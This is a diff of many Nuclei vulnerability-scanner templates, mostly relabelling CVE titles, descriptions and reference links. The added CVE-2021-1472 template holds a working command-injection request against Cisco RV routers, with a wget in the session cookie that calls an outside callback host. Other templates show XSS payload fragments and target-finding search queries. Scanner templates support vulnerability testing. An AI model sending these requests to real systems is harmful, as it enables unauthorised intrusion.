     8 + Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 contain a cross-site scripting vulnerability due to improper input validation.
    9 9   reference:
    10 10   - https://support.citrix.com/article/CTX276688
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2020-8191
    11 12   classification:
    12 13   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    13 14   cvss-score: 6.1
    skipped 26 lines
    40 41   words:
    41 42   - "text/html"
    42 43   part: header
     44 + 
     45 +# Enhanced by mp on 2022/09/02
     46 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2020/CVE-2020-8512.yaml
    1 1  id: CVE-2020-8512
    2 2   
    3 3  info:
    4  - name: IceWarp WebMail XSS
     4 + name: IceWarp WebMail Server <=11.4.4.1 - Cross-Site Scripting
    5 5   author: pdteam,dwisiswant0
    6 6   severity: medium
    7  - description: In IceWarp Webmail Server through 11.4.4.1, there is XSS in the /webmail/ color parameter.
     7 + description: IceWarp Webmail Server through 11.4.4.1 contains a cross-site scripting vulnerability in the /webmail/ color parameter.
    8 8   reference:
    9 9   - https://www.exploit-db.com/exploits/47988
    10 10   - https://twitter.com/sagaryadav8742/status/1275170967527006208
    11 11   - https://cxsecurity.com/issue/WLB-2020010205
    12 12   - https://packetstormsecurity.com/files/156103/IceWarp-WebMail-11.4.4.1-Cross-Site-Scripting.html
     13 + - https://nvd.nist.gov/vuln/detail/CVE-2020-8512
    13 14   classification:
    14 15   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    15 16   cvss-score: 6.1
    skipped 21 lines
    37 38   - "text/html"
    38 39   part: header
    39 40   
     41 +# Enhanced by mp on 2022/09/02
     42 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2020/CVE-2020-9036.yaml
    1 1  id: CVE-2020-9036
    2 2   
    3 3  info:
    4  - name: Jeedom through 4.0.38 allows XSS
     4 + name: Jeedom <=4.0.38 - Cross-Site Scripting
    5 5   author: pikpikcu
    6 6   severity: medium
    7  - description: Jeedom through 4.0.38 allows XSS.
     7 + description: Jeedom through 4.0.38 contains a cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
    8 8   reference:
    9 9   - https://sysdream.com/news/lab/2020-08-05-cve-2020-9036-jeedom-xss-leading-to-remote-code-execution/
    10 10   - https://nvd.nist.gov/vuln/detail/CVE-2020-9036
    skipped 25 lines
    36 36   words:
    37 37   - text/html
    38 38   
     39 +# Enhanced by mp on 2022/09/02
     40 + 
  • ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2020/CVE-2020-9344.yaml
    1 1  id: CVE-2020-9344
    2 2   
    3 3  info:
    4  - name: Jira Subversion ALM for enterprise XSS
     4 + name: Jira Subversion ALM for Enterprise <8.8.2 - Cross-Site Scripting
    5 5   author: madrobot
    6 6   severity: medium
    7  - description: Subversion ALM for the enterprise before 8.8.2 allows reflected XSS at multiple locations.
     7 + description: Jira Subversion ALM for Enterprise before 8.8.2 contains a cross-site scripting vulnerability at multiple locations.
    8 8   reference:
    9 9   - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9344
    10 10   - https://kintosoft.atlassian.net/wiki/spaces/SVNALM/pages/753565697/Security+Bulletin
    11 11   - https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-007.txt
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2020-13483
    12 13   classification:
    13 14   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    14 15   cvss-score: 6.1
    skipped 25 lines
    40 41   words:
    41 42   - "text/html"
    42 43   part: header
     44 + 
     45 +# Enhanced by md on 2022/09/02
     46 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2020/CVE-2020-9496.yaml
    1 1  id: CVE-2020-9496
    2 2   
    3 3  info:
    4  - name: Apache OFBiz XML-RPC Java Deserialization
     4 + name: Apache OFBiz 17.12.03 - Cross-Site Scripting
    5 5   author: dwisiswant0
    6 6   severity: medium
    7  - description: XML-RPC request are vulnerable to unsafe deserialization and Cross-Site Scripting issues in Apache OFBiz 17.12.03
     7 + description: Apache OFBiz 17.12.03 contains cross-site scripting and unsafe deserialization vulnerabilities via an XML-RPC request.
    8 8   reference:
    9 9   - http://packetstormsecurity.com/files/158887/Apache-OFBiz-XML-RPC-Java-Deserialization.html
    10 10   - http://packetstormsecurity.com/files/161769/Apache-OFBiz-XML-RPC-Java-Deserialization.html
    11 11   - https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz
    12 12   - https://s.apache.org/l0994
     13 + - https://nvd.nist.gov/vuln/detail/CVE-2020-9496
    13 14   classification:
    14 15   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    15 16   cvss-score: 6.1
    skipped 28 lines
    44 45   status:
    45 46   - 200
    46 47   
     48 +# Enhanced by md on 2022/09/02
     49 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-1472.yaml
     1 +id: CVE-2021-1472
     2 + 
     3 +info:
     4 + name: Cisco Small Business RV Series - Authentication Bypass and Command Injection
     5 + author: gy741
     6 + severity: critical
     7 + description: |
     8 + Multiple vulnerabilities exist in the web-based management interface of Cisco Small Business RV Series Routers. A remote
     9 + attacker could execute arbitrary commands or bypass authentication and upload files on an affected device.
     10 + reference:
     11 + - https://www.iot-inspector.com/blog/advisory-cisco-rv34x-authentication-bypass-remote-command-execution/
     12 + - https://packetstormsecurity.com/files/162238/Cisco-RV-Authentication-Bypass-Code-Execution.html
     13 + - https://nvd.nist.gov/vuln/detail/CVE-2021-1472
     14 + - https://nvd.nist.gov/vuln/detail/CVE-2021-1473
     15 + classification:
     16 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     17 + cvss-score: 9.8
     18 + cve-id: CVE-2021-1472
     19 + cwe-id: CWE-287
     20 + metadata:
     21 + shodan-query: http.html:"Cisco rv340"
     22 + verified: "true"
     23 + tags: auth-bypass,injection,packetstorm,cve,cve2021,cisco,rce,intrusive
     24 + 
     25 +requests:
     26 + - raw:
     27 + - |
     28 + POST /upload HTTP/1.1
     29 + Host: {{Hostname}}
     30 + Cookie: sessionid='`wget http://{{interactsh-url}}`'
     31 + Authorization: QUt6NkpTeTE6dmk4cW8=
     32 + Content-Type: multipart/form-data; boundary=---------------------------392306610282184777655655237536
     33 + 
     34 + -----------------------------392306610282184777655655237536
     35 + Content-Disposition: form-data; name="option"
     36 + 
     37 + 5NW9Cw1J
     38 + -----------------------------392306610282184777655655237536
     39 + Content-Disposition: form-data; name="destination"
     40 + 
     41 + J0I5k131j2Ku
     42 + -----------------------------392306610282184777655655237536
     43 + Content-Disposition: form-data; name="file.path"
     44 + 
     45 + EKsmqqg0
     46 + -----------------------------392306610282184777655655237536
     47 + Content-Disposition: form-data; name="file"; filename="config.xml"
     48 + Content-Type: application/xml
     49 + 
     50 + qJ57CM9
     51 + -----------------------------392306610282184777655655237536
     52 + Content-Disposition: form-data; name="filename"
     53 + 
     54 + JbYXJR74n.xml
     55 + -----------------------------392306610282184777655655237536
     56 + Content-Disposition: form-data; name="GXbLINHYkFI"
     57 + 
     58 + <input><fileType>configuration</fileType><source><location-url>FILE://Configuration/config.xml</location-url></source><destination><config-type>config-running</config-type></destination></input>
     59 + -----------------------------392306610282184777655655237536--
     60 + 
     61 + matchers-condition: and
     62 + matchers:
     63 + - type: word
     64 + part: interactsh_protocol
     65 + words:
     66 + - http
     67 + 
     68 + - type: word
     69 + part: body
     70 + words:
     71 + - '"jsonrpc":'
     72 + 
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-20031.yaml
    skipped 15 lines
    16 16   cve-id: CVE-2021-20031
    17 17   cwe-id: CWE-601
    18 18   metadata:
    19  - google-dork: inurl:"auth.html" intitle:"SonicWall"
     19 + google-query: inurl:"auth.html" intitle:"SonicWall"
    20 20   tags: sonicwall,redirect,edb,packetstorm,cve,cve2021
    21 21   
    22 22  requests:
    skipped 18 lines
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-20137.yaml
    1 1  id: CVE-2021-20137
    2 2   
    3 3  info:
    4  - name: Gryphon Tower - Reflected XSS
     4 + name: Gryphon Tower - Cross-Site Scripting
    5 5   author: edoardottt
    6 6   severity: medium
    7  - description: A reflected cross-site scripting vulnerability exists in the url parameter of the /cgi-bin/luci/site_access/ page on the Gryphon Tower router's web interface. An attacker could exploit this issue by tricking a user into following a specially crafted link, granting the attacker javascript execution in the context of the victim's browser.
     7 + description: Gryphon Tower router web interface contains a reflected cross-site scripting vulnerability in the url parameter of the /cgi-bin/luci/site_access/ page. An attacker can exploit this issue by tricking a user into following a specially crafted link, granting the attacker JavaScript execution in the victim's browser.
    8 8   classification:
    9 9   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    10 10   cvss-score: 6.1
    11 11   cve-id: CVE-2021-20137
    12 12   cwe-id: CWE-79
    13 13   reference:
    14  - - https://nvd.nist.gov/vuln/detail/CVE-2021-20137
    15 14   - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20137
    16 15   - https://www.tenable.com/security/research/tra-2021-51
     16 + - https://nvd.nist.gov/vuln/detail/CVE-2021-20137
    17 17   tags: xss,tenable,cve,cve2021,gryphon
    18 18   
    19 19  requests:
    skipped 18 lines
    38 38   - 'onfocus=alert(document.domain) autofocus=1>'
    39 39   - 'Send Access Request URL'
    40 40   condition: and
     41 + 
     42 +# Enhanced by md on 2022/09/02
     43 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-20792.yaml
    1 1  id: CVE-2021-20792
    2 2   
    3 3  info:
    4  - name: Quiz And Survey Master < 7.1.14 - Reflected Cross-Site Scripting
     4 + name: WordPress Quiz and Survey Master <7.1.14 - Cross-Site Scripting
    5 5   author: dhiyaneshDK
    6 6   severity: medium
    7  - description: Cross-site scripting vulnerability in Quiz And Survey Master versions prior to 7.1.14 allows a remote attacker to inject arbitrary script via unspecified vectors."
     7 + description: WordPress Quiz and Survey Master plugin prior to 7.1.14 contains a cross-site scripting vulnerability which allows a remote attacker to inject arbitrary script via unspecified vectors.
    8 8   reference:
    9 9   - https://wpscan.com/vulnerability/4deb3464-00ed-483b-8d91-f9dffe2d57cf
    10  - - https://nvd.nist.gov/vuln/detail/CVE-2021-20792
    11 10   - https://quizandsurveymaster.com/
    12 11   - https://jvn.jp/en/jp/JVN65388002/index.html
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2021-20792
    13 13   classification:
    14 14   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    15 15   cvss-score: 6.1
    skipped 33 lines
    49 49   words:
    50 50   - "text/html"
    51 51   
     52 +# Enhanced by mp on 2022/09/02
     53 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-21799.yaml
    1 1  id: CVE-2021-21799
    2 2   
    3 3  info:
    4  - name: Advantech R-SeeNet v 2.4.12 - Cross Site Scripting
     4 + name: Advantech R-SeeNet 2.4.12 - Cross-Site Scripting
    5 5   author: arafatansari
    6 6   severity: medium
    7 7   description: |
    8  - Advantech R-SeeNet v 2.4.12 is vulnerable to Refleced Cross Site Scripting in the telnet_form.php script functionality.
     8 + Advantech R-SeeNet 2.4.12 contains a reflected cross-site scripting vulnerability in the telnet_form.php script functionality.
    9 9   reference:
    10 10   - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1270
    11  - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21799
    12 11   - https://nvd.nist.gov/vuln/detail/CVE-2021-21799
    13 12   classification:
    14 13   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    skipped 26 lines
    41 40   status:
    42 41   - 200
    43 42   
     43 +# Enhanced by mp on 2022/09/02
     44 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-21800.yaml
    1 1  id: CVE-2021-21800
    2 2   
    3 3  info:
    4  - name: Advantech R-SeeNet v 2.4.12 - Cross Site Scripting
     4 + name: Advantech R-SeeNet 2.4.12 - Cross-Site Scripting
    5 5   author: arafatansari
    6 6   severity: medium
    7 7   description: |
    8  - Advantech R-SeeNet v 2.4.12 is vulnerable to Refleced Cross Site Scripting in the ssh_form.php script functionality.
     8 + Advantech R-SeeNet 2.4.12 contains a reflected cross-site scripting vulnerability in the ssh_form.php script functionality.
    9 9   reference:
    10 10   - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1271
    11  - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21800
    12 11   - https://nvd.nist.gov/vuln/detail/CVE-2021-21800
    13 12   classification:
    14 13   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    skipped 26 lines
    41 40   status:
    42 41   - 200
    43 42   
     43 +# Enhanced by mp on 2022/09/02
     44 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-21801.yaml
    1 1  id: CVE-2021-21801
    2 2   
    3 3  info:
    4  - name: Advantech R-SeeNet graph parameter - Reflected Cross-Site Scripting (XSS)
     4 + name: Advantech R-SeeNet - Cross-Site Scripting
    5 5   author: gy741
    6 6   severity: medium
    7  - description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to
    8  - arbitrary JavaScript code execution.
     7 + description: Advantech R-SeeNet contains a cross-site scripting vulnerability in the device_graph_page.php script via the graph parameter. A specially crafted URL by an attacker can lead to arbitrary JavaScript code execution.
    9 8   reference:
    10 9   - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272
     10 + - https://nvd.nist.gov/vuln/detail/CVE-2021-21801
    11 11   classification:
    12 12   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    13 13   cvss-score: 6.1
    skipped 24 lines
    38 38   status:
    39 39   - 200
    40 40   
     41 +# Enhanced by mp on 2022/09/02
     42 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-21802.yaml
    1 1  id: CVE-2021-21802
    2 2   
    3 3  info:
    4  - name: Advantech R-SeeNet device_id parameter - Reflected Cross-Site Scripting (XSS)
     4 + name: Advantech R-SeeNet - Cross-Site Scripting
    5 5   author: gy741
    6 6   severity: medium
    7  - description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to
    8  - arbitrary JavaScript code execution.
     7 + description: Advantech R-SeeNet contains a cross-site scripting vulnerability in the device_graph_page.php script via the device_id parameter. A specially crafted URL by an attacker can lead to arbitrary JavaScript code execution.
    9 8   reference:
    10 9   - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272
     10 + - https://nvd.nist.gov/vuln/detail/CVE-2021-21801
    11 11   classification:
    12 12   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    13 13   cvss-score: 6.1
    skipped 24 lines
    38 38   status:
    39 39   - 200
    40 40   
     41 +# Enhanced by mp on 2022/09/02
     42 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-21803.yaml
    1 1  id: CVE-2021-21803
    2 2   
    3 3  info:
    4  - name: Advantech R-SeeNet is2sim parameter - Reflected Cross-Site Scripting (XSS)
     4 + name: Advantech R-SeeNet - Cross-Site Scripting
    5 5   author: gy741
    6 6   severity: medium
    7  - description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to
    8  - arbitrary JavaScript code execution.
     7 + description: Advantech R-SeeNet is vulnerable to cross-site scripting via the device_graph_page.php script via the is2sim parameter. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution.
    9 8   reference:
    10 9   - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272
     10 + - https://nvd.nist.gov/vuln/detail/CVE-2021-21803
    11 11   classification:
    12 12   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    13 13   cvss-score: 6.1
    skipped 24 lines
    38 38   status:
    39 39   - 200
    40 40   
     41 +# Enhanced by mp on 2022/09/02
     42 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-22122.yaml
    1 1  id: CVE-2021-22122
    2 2   
    3 3  info:
    4  - name: FortiWeb v6.3.x-6.2.x Unauthenticated XSS
     4 + name: FortiWeb - Cross-Site Scripting
    5 5   author: dwisiswant0
    6 6   severity: medium
    7 7   description: |
    8  - An improper neutralization of input during web page generation in FortiWeb GUI interface 6.3.0 through 6.3.7 and version before 6.2.4 may allow an unauthenticated,
    9  - remote attacker to perform a reflected cross site scripting attack (XSS) by injecting malicious payload in different vulnerable API end-points.
     8 + FortiWeb 6.3.0 through 6.3.7 and versions before 6.2.4 contain an unauthenticated cross-site scripting vulnerability. Improper neutralization of input during web page generation can allow a remote attacker to inject malicious payload in vulnerable API end-points.
    10 9   reference:
    11 10   - https://www.fortiguard.com/psirt/FG-IR-20-122
    12 11   - https://twitter.com/ptswarm/status/1357316793753362433
    13 12   - https://fortiguard.com/advisory/FG-IR-20-122
     13 + - https://nvd.nist.gov/vuln/detail/CVE-2021-22122
    14 14   classification:
    15 15   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    16 16   cvss-score: 6.1
    skipped 15 lines
    32 32   condition: and
    33 33   part: body
    34 34   
     35 +# Enhanced by mp on 2022/09/02
     36 + 
  • ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-24176.yaml
    1 1  id: CVE-2021-24176
    2 2   
    3 3  info:
    4  - name: WordPress JH 404 Logger XSS
     4 + name: WordPress JH 404 Logger <=1.1 - Cross-Site Scripting
    5 5   author: Ganofins
    6 6   severity: medium
    7  - description: JH 404 Logger WordPress plugin through 1.1 doesn't sanitise the referer and path of 404 pages, when they are output in the dashboard, which leads to executing arbitrary JavaScript code in the WordPress dashboard.
     7 + description: WordPress JH 404 Logger plugin through 1.1 contains a cross-site scripting vulnerability. Referer and path of 404 pages are not properly sanitized when they are output in the WordPress dashboard, which can lead to executing arbitrary JavaScript code.
    8 8   reference:
    9 9   - https://wpscan.com/vulnerability/705bcd6e-6817-4f89-be37-901a767b0585
    10 10   - https://wordpress.org/plugins/jh-404-logger/
    11 11   - https://ganofins.com/blog/my-first-cve-2021-24176/
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24176
    12 13   classification:
    13 14   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    14 15   cvss-score: 5.4
    skipped 16 lines
    31 32   - type: status
    32 33   status:
    33 34   - 200
     35 + 
     36 +# Enhanced by mp on 2022/09/02
     37 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-24235.yaml
    1 1  id: CVE-2021-24235
    2 2   
    3 3  info:
    4  - name: Goto - Tour & Travel < 2.0 - Reflected Cross-Site Scripting (XSS)
     4 + name: WordPress Goto Tour & Travel Theme <2.0 - Cross-Site Scripting
    5 5   author: daffainfo
    6 6   severity: medium
    7  - description: The Goto WordPress theme before 2.0 does not sanitise the keywords and start_date GET parameter on its Tour List page, leading to an unauthenticated reflected Cross-Site Scripting issue.
     7 + description: WordPress Goto Tour & Travel theme before 2.0 contains an unauthenticated reflected cross-site scripting vulnerability. It does not sanitize the keywords and start_date GET parameters on its Tour List page.
    8 8   reference:
    9  - - https://nvd.nist.gov/vuln/detail/CVE-2021-24235
    10 9   - https://wpscan.com/vulnerability/eece90aa-582b-4c49-8b7c-14027f9df139
    11 10   - https://m0ze.ru/vulnerability/[2021-02-10]-[WordPress]-[CWE-79]-Goto-WordPress-Theme-v1.9.txt
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24235
    12 12   classification:
    13 13   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    14 14   cvss-score: 6.1
    skipped 24 lines
    39 39   status:
    40 40   - 200
    41 41   
     42 +# Enhanced by mp on 2022/09/02
     43 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-24237.yaml
    1 1  id: CVE-2021-24237
    2 2   
    3 3  info:
    4  - name: Realteo WordPress Plugin <= 1.2.3 - Unauthenticated Reflected XSS
     4 + name: WordPress Realteo <=1.2.3 - Cross-Site Scripting
    5 5   author: 0x_Akoko
    6 6   severity: medium
    7  - description: The plugin, used by the Findeo Theme, did not properly sanitise the keyword_search, search_radius.
     7 + description: WordPress Realteo plugin 1.2.3 and prior contains an unauthenticated reflected cross-site scripting vulnerability due to improper sanitization of keyword_search, search_radius. _bedrooms and _bathrooms GET parameters before outputting them in its properties page.
    8 8   reference:
    9 9   - https://wpscan.com/vulnerability/087b27c4-289e-410f-af74-828a608a4e1e
    10 10   - https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Realteo-WordPress-Plugin-v1.2.3.txt
    11  - - https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Findeo-WordPress-Theme-v1.3.0.txt
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24237
    12 12   classification:
    13 13   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    14 14   cvss-score: 6.1
    skipped 24 lines
    39 39   - "text/html"
    40 40   part: header
    41 41   
     42 +# Enhanced by mp on 2022/09/02
     43 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-24245.yaml
    1 1  id: CVE-2021-24245
    2 2   
    3 3  info:
    4  - name: WordPress Plugin Stop Spammers 2021.8 - Reflected XSS
     4 + name: WordPress Stop Spammers <2021.9 - Cross-Site Scripting
    5 5   author: edoardottt
    6 6   severity: medium
    7  - description: The Stop Spammers WordPress plugin before 2021.9 did not escape user input when blocking requests (such as matching a spam word), outputting it in an attribute after sanitising it to remove HTML tags, which is not sufficient and lead to a reflected Cross-Site Scripting issue.
     7 + description: WordPress Stop Spammers plugin before 2021.9 contains a reflected cross-site scripting vulnerability. It does not escape user input when blocking requests (such as matching a spam word), thus outputting it in an attribute after sanitizing it to remove HTML tags.
    8 8   reference:
    9  - - https://nvd.nist.gov/vuln/detail/CVE-2021-24245
    10  - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24245
    11 9   - https://packetstormsecurity.com/files/162623/WordPress-Stop-Spammers-2021.8-Cross-Site-Scripting.html
    12 10   - https://wpscan.com/vulnerability/5e7accd6-08dc-4c6e-9d19-73e2d7e97735
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24245
    13 12   classification:
    14 13   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    15 14   cvss-score: 6.1
    skipped 26 lines
    42 41   part: body
    43 42   words:
    44 43   - "ad\" accesskey=X onclick=alert(1)"
     44 + 
     45 +# Enhanced by mp on 2022/09/02
     46 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-24274.yaml
    1 1  id: CVE-2021-24274
    2 2   
    3 3  info:
    4  - name: Ultimate Maps by Supsystic < 1.2.5 - Reflected Cross-Site scripting (XSS)
     4 + name: WordPress Supsystic Ultimate Maps <1.2.5 - Cross-Site Scripting
    5 5   author: dhiyaneshDK
    6 6   severity: medium
    7  - description: The Ultimate Maps by Supsystic WordPress plugin before 1.2.5 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
     7 + description: WordPress Supsystic Ultimate Maps plugin before 1.2.5 contains an unauthenticated reflected cross-site scripting vulnerability due to improper sanitization of the tab parameter on the options page before outputting it in an attribute.
    8 8   reference:
    9 9   - https://wpscan.com/vulnerability/200a3031-7c42-4189-96b1-bed9e0ab7c1d
     10 + - http://packetstormsecurity.com/files/164316/WordPress-Ultimate-Maps-1.2.4-Cross-Site-Scripting.html
    10 11   - https://nvd.nist.gov/vuln/detail/CVE-2021-24274
    11  - - http://packetstormsecurity.com/files/164316/WordPress-Ultimate-Maps-1.2.4-Cross-Site-Scripting.html
    12 12   classification:
    13 13   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    14 14   cvss-score: 6.1
    skipped 22 lines
    37 37   - "text/html"
    38 38   part: header
    39 39   
     40 +# Enhanced by mp on 2022/09/02
     41 + 
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-24370.yaml
    skipped 16 lines
    17 17   cve-id: CVE-2021-24370
    18 18   cwe-id: CWE-434,CWE-434
    19 19   metadata:
    20  - google-dork: inurl:“/wp-content/plugins/fancy-product-designer”
     20 + google-query: inurl:“/wp-content/plugins/fancy-product-designer”
    21 21   tags: fancyproduct,wpscan,cve,cve2021,wordpress,rce,wp-plugin,wp
    22 22   
    23 23  requests:
    skipped 20 lines
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-25120.yaml
    skipped 6 lines
    7 7   description: Easy Social Feed < 6.2.7 is susceptible to reflected cross-site scripting because the plugin does not sanitize and escape a parameter before outputting it back in an admin dashboard page, leading to it being executed in the context of a logged admin or editor.
    8 8   reference:
    9 9   - https://wpscan.com/vulnerability/6dd00198-ef9b-4913-9494-e08a95e7f9a0
    10  - - https://www.cvedetails.com/cve/CVE-2021-25120/
    11 10   - https://wpscan.com/vulnerability/0ad020b5-0d16-4521-8ea7-39cd206ab9f6
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2021-25120
    12 12   classification:
    13 13   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    14 14   cvss-score: 6.1
    skipped 37 lines
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-27330.yaml
    skipped 16 lines
    17 17   cve-id: CVE-2021-27330
    18 18   cwe-id: CWE-79
    19 19   metadata:
    20  - google-dork: intitle:TriConsole.com - PHP Calendar Date Picker
     20 + google-query: intitle:TriConsole.com - PHP Calendar Date Picker
    21 21   verified: "true"
    22 22   tags: xss,edb,cve,cve2021,triconsole
    23 23   
    skipped 25 lines
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-31589.yaml
    skipped 16 lines
    17 17   cve-id: CVE-2021-31589
    18 18   cwe-id: CWE-79
    19 19   metadata:
    20  - google-dork: '"BeyondTrust" "Redistribution Prohibited"'
     20 + google-query: '"BeyondTrust" "Redistribution Prohibited"'
    21 21   shodan-query: 'set-cookie: nsbase_session'
    22 22   tags: xss,packetstorm,cve,cve2021,beyondtrust,bomgar
    23 23   
    skipped 21 lines
  • ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-36749.yaml
    skipped 5 lines
    6 6   severity: medium
    7 7   description: Apache Druid ingestion system is vulnerable to local file inclusion. The InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1.
    8 8   reference:
    9  - - https://www.cvedetails.com/cve/CVE-2021-36749/
    10 9   - https://github.com/BrucessKING/CVE-2021-36749
    11 10   - https://lists.apache.org/thread.html/rc9400a70d0ec5cdb8a3486fc5ddb0b5282961c0b63e764abfbcb9f5d%40%3Cdev.druid.apache.org%3E
    12 11   - https://nvd.nist.gov/vuln/detail/CVE-2021-36749
    skipped 27 lines
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-39501.yaml
    skipped 6 lines
    7 7   description: EyouCMS 1.5.4 is vulnerable to an Open Redirect vulnerability. An attacker can redirect a user to a malicious url via the Logout function.
    8 8   reference:
    9 9   - https://github.com/eyoucms/eyoucms/issues/17
    10  - - https://www.cvedetails.com/cve/CVE-2021-39501
    11 10   - https://github.com/KietNA-HPT/CVE
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2021-39501
    12 12   classification:
    13 13   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    14 14   cvss-score: 6.1
    skipped 18 lines
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-45043.yaml
    skipped 15 lines
    16 16   cve-id: CVE-2021-45043
    17 17   cwe-id: CWE-22
    18 18   metadata:
    19  - google-dork: intitle:"HD-Network Real-time Monitoring System V2.0"
     19 + google-query: intitle:"HD-Network Real-time Monitoring System V2.0"
    20 20   tags: camera,edb,cve,cve2021,hdnetwork,lfi,iot
    21 21   
    22 22  requests:
    skipped 19 lines
